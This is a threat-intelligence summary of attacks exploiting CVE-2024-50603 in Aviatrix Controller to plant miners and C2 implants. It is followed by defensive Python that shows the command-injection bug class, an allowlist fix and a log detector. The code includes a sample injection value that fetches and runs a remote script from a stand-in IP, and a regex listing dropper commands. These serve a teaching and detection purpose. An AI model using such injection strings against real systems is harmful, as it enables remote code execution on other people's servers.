| Section | Details |
|---|---|
| Threat Actors | Unknown threat actors |
| Campaign Overview | Exploitation of CVE-2024-50603 in Aviatrix Controller to deploy backdoors and cryptocurrency miners. |
| Targets (Victims) | Organizations running Aviatrix Controller in enterprise cloud environments, particularly deployments in AWS |
| Methodology | • Attackers exploit CVE-2024-50603 to gain unauthenticated remote code execution on the controller. • XMRig cryptocurrency miners and Sliver C2 implants are then deployed for persistence and follow-on exploitation. |
| Product Targeted | Aviatrix Controller cloud networking platform |
| Malware Reference | XMRig (cryptocurrency miner), Sliver C2 framework |
| Tools Used | • XMRig (cryptocurrency mining) • Sliver C2 framework |
| Vulnerabilities Exploited | CVE-2024-50603 (unauthenticated remote code execution via OS command injection, caused by improper input sanitization in API endpoints) |
| TTPs | • Injecting OS commands through unsanitized API endpoint parameters. • Lateral movement toward administrative cloud control-plane permissions. • Privilege escalation within the cloud environment. |
| Attribution | Unknown |
| Recommendations | • Apply the vendor patch immediately. • Prevent public (internet) access to the Aviatrix Controller. • Harden configurations and follow the vendor's best practices. |
| Source | The Hacker News |
Read full article: https://thehackernews.com/2025/01/hackers-exploit-aviatrix-controller.html
The above summary has been generated by an AI language model
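The table describes the bug class (an API parameter pasted unsanitized into an OS command) and the follow-on activity (dropper one-liners fetching miners and C2 implants) but not how either looks in practice. The Python below is an added illustration, not Aviatrix Controller code and not from the article: the handler, command path, endpoint name and `cloud_type` parameter are assumptions chosen to show the pattern, the access-log lines are constructed, and the detection regexes are a heuristic for hunting injection attempts in web-server logs, not indicators from the source.

```python
"""Illustrative Python example (not Aviatrix code): the OS-command-injection
bug class behind CVE-2024-50603, its hardened form, and a log check for
exploitation attempts.  Endpoint, path and parameter names are assumptions."""
import re
import shlex
import urllib.parse

# Assumption: the handler accepts a small fixed vocabulary for this parameter.
ALLOWED_CLOUD_TYPES = {"aws", "azure", "gcp"}


def build_command_vulnerable(cloud_type: str) -> str:
    """Bug class: the API parameter is concatenated straight into a shell
    command string.  Returned instead of executed so the example stays inert."""
    return f"/opt/ctl/flightpath --cloud {cloud_type}"


def shell_command_count(cmd: str) -> int:
    """Number of separate commands a POSIX shell would run for `cmd`.
    Anything above 1 means the parameter broke out of the intended command."""
    tokens = list(shlex.shlex(cmd, punctuation_chars=True))
    return 1 + sum(1 for t in tokens if t in (";", "&&", "||", "|"))


def build_command_safe(cloud_type: str) -> list:
    """Hardened form: allowlist the value and build an argv list meant for
    subprocess.run(argv) without shell=True, so no shell ever parses it."""
    if cloud_type not in ALLOWED_CLOUD_TYPES:
        raise ValueError(f"rejected cloud_type: {cloud_type!r}")
    return ["/opt/ctl/flightpath", "--cloud", cloud_type]


# Detection side: flag query parameters carrying shell metacharacters or the
# download-and-run verbs typical of miner/C2 dropper one-liners (heuristic).
SHELL_META = re.compile(r"[;&|`$(){}<>]")
DROPPER_WORDS = re.compile(r"\b(curl|wget|nohup|chmod|xmrig|base64)\b", re.I)
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def flag_suspicious_requests(log_lines):
    """Return one dict per decoded query parameter that looks like an
    OS-command-injection attempt (combined-format access-log lines)."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        src, method, target, status = m.groups()
        query = urllib.parse.urlsplit(target).query
        params = urllib.parse.parse_qs(query, keep_blank_values=True)
        for name, values in params.items():
            for v in values:  # parse_qs already percent-decodes the value
                if SHELL_META.search(v) or DROPPER_WORDS.search(v):
                    hits.append({"src": src, "method": method, "param": name,
                                 "value": v, "status": status})
    return hits


# Constructed access-log lines for the demonstration (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jan/2025:12:00:01 +0000] "GET /v1/api?action=list_instances&cloud_type=aws HTTP/1.1" 200',
    '198.51.100.23 - - [10/Jan/2025:12:00:02 +0000] "GET /v1/api?action=list_instances&cloud_type=aws%3B%20wget%20203.0.113.7%2Fm.sh%20-O-%20%7C%20sh HTTP/1.1" 200',
    '10.0.0.9 - - [10/Jan/2025:12:00:03 +0000] "GET /v1/api?action=list_instances&cloud_type=gcp HTTP/1.1" 200',
]

if __name__ == "__main__":
    payload = "aws; wget 203.0.113.7/m.sh -O- | sh"
    print(shell_command_count(build_command_vulnerable(payload)))  # 3 commands
    try:
        build_command_safe(payload)
    except ValueError as err:
        print(err)
    for hit in flag_suspicious_requests(SAMPLE_LOG):
        print(hit)
```

The allowlist plus argv-list approach is the fix that closes this bug class regardless of which metacharacters an attacker tries; the regex check is only a triage aid and will miss encodings or argument-injection variants that never use a shell separator, so treat a hit as a lead for the controller's own audit logs rather than as proof of compromise.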